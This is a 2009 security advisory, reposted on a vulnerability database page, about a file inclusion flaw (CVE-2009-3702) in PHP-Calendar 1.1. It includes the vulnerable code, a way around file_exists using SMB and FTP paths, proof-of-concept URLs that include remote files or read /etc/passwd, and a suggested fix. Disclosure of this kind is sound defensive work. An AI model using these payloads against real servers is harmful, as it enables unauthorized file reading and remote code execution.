Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormJuan Galiana LaraPACKETSTORM:84064
HistoryDec 18, 2009 - 12:00 a.m.

PHP-Calendar 1.1 Remote/Local File Inclusion

2009-12-1800:00:00
Juan Galiana Lara
packetstormsecurity.com
26

0.007 Low

EPSS

Percentile

77.2%

JSON
`=============================================  
INTERNET SECURITY AUDITORS ALERT 2009-011  
- Original release date: October 13th, 2009  
- Last revised: December 18th, 2009  
- Discovered by: Juan Galiana Lara  
- CVE ID: CVE-2009-3702  
- Severity: 8.5/10 (CVSS Base Score)  
=============================================  
  
I. VULNERABILITY  
-------------------------  
PHP-Calendar v1.1 'configfile' Remote and Local File Inclusion  
vulnerability  
  
II. BACKGROUND  
-------------------------  
PHP-Calendar is a simple web calendar. It is targeted towards groups  
that need to collaboratively create and track events. In that same  
collaborative spirit, the source for PHP-Calendar is available under  
an open source license for anyone to use and modify.  
  
III. DESCRIPTION  
-------------------------  
The 'configfile' variable is not properly filtered, and is possible to  
include arbitrary remote and local files. This attack may lead to the  
execution of arbitrary code.  
  
The snippet of vulnerable code (part of update08.php and update10.php  
file):  
  
36 } elseif(!empty($_GET['configfile'])) {  
37 if(file_exists($_GET['configfile'])) {  
38 require_once($_GET['configfile']);  
  
In order to include remote files, the value 'On' in the  
allow_url_fopen directive is needed. There are two cases in which it  
is possible remote code execution due to bypass the file_exists function:  
  
1) If the victim server is running Windows operating system and there  
is not a firewall filtering outgoing SMB requests, an attacker can use  
an URL like //servername/path/to/file.php  
2) If server is running PHP version > 5.0.0 (the most common) an  
attacker can use FTP/FTPS protocol for inclusion. Like  
ftp://servername/path/to/file.php See references for more information.  
  
IV. PROOF OF CONCEPT  
-------------------------  
For including remote files:  
  
http://site/php-calendar-1.1/update08.php?configfile=//servername/path/to/file.php  
http://site/php-calendar-1.1/update08.php?configfile=ftp://guest:pass@site/path/to/file.php  
http://site/php-calendar-1.1/update10.php?configfile=\\ip\path\to\file.php  
http://site/php-calendar-1.1/update10.php?configfile=ftp://site/path/to/file.php  
  
Local files, this PoC will show the /etc/passwd file:  
  
http://site/php-calendar-1.1/update08.php?configfile=/etc/passwd  
http://site/php-calendar-1.1/update10.php?configfile=/etc/passwd  
  
V. BUSINESS IMPACT  
-------------------------  
Unauthenticated users can view any local file in the filesystem and  
could execute arbitrary code remotely.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
PHP-Calendar version 1.1 is vulnerable, others may be affected  
  
VII. SOLUTION  
-------------------------  
Change the code of update08.php (line 38) and update10.php (line 35)  
in order to filter $_GET['configfile'] variable.  
  
if (ereg('^[a-zA-Z0-9_]+$', $_GET['configfile']))  
require_once($_GET['configfile']);  
  
III. REFERENCES  
-------------------------  
http://www.php-calendar.com/  
http://www.php.net/manual/en/wrappers.ftp.php  
http://www.isecauditors.com/  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered by  
Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).  
  
X. REVISION HISTORY  
-------------------------  
October 13, 2009: Initial release.  
October 19, 2009: Added CVE id.  
December 18, 2009: Last revision.  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
October 13, 2009: Vulnerability discovered by  
Internet Security Auditors (www.isecauditors.com)  
October 13, 2009: Sent to developers. No response.  
December 13, 2009: Contact again. No response.  
December 18, 2009: Added mitigation solution and sent to lists.  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is"  
with no warranties or guarantees of fitness of use or otherwise.  
Internet Security Auditors accepts no responsibility for any damage  
caused by the use or misuse of this information.  
`

Related

seebug 1
securityvulns 2
prion 1
cvelist 1
cve 1
openvas 1
seebug
seebug
PHP-Calendar configfileε˜ι‡θΏœη¨‹ζ–‡δ»ΆεŒ…ε«ζΌζ΄ž
2009-12-25 00:00:00
securityvulns
securityvulns
[ISecAuditors Security Advisories] PHP-Calendar <= v1.1 'configfile' Remote and Local File Inclusion vulnerability
2009-12-21 00:00:00
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
2009-12-21 00:00:00
prion
prion
Path traversal
2009-12-22 19:30:00
cvelist
cvelist
CVE-2009-3702
2009-12-22 19:00:00
cve
cve
CVE-2009-3702
2009-12-22 19:30:00
openvas
openvas
PHP-Calendar Multiple Remote And Local File Inclusion Vulnerabilities
2009-12-31 00:00:00

0.007 Low

EPSS

Percentile

77.2%

JSON
Related for PACKETSTORM:84064
seebug1securityvulns2prion1cvelist1cve1openvas1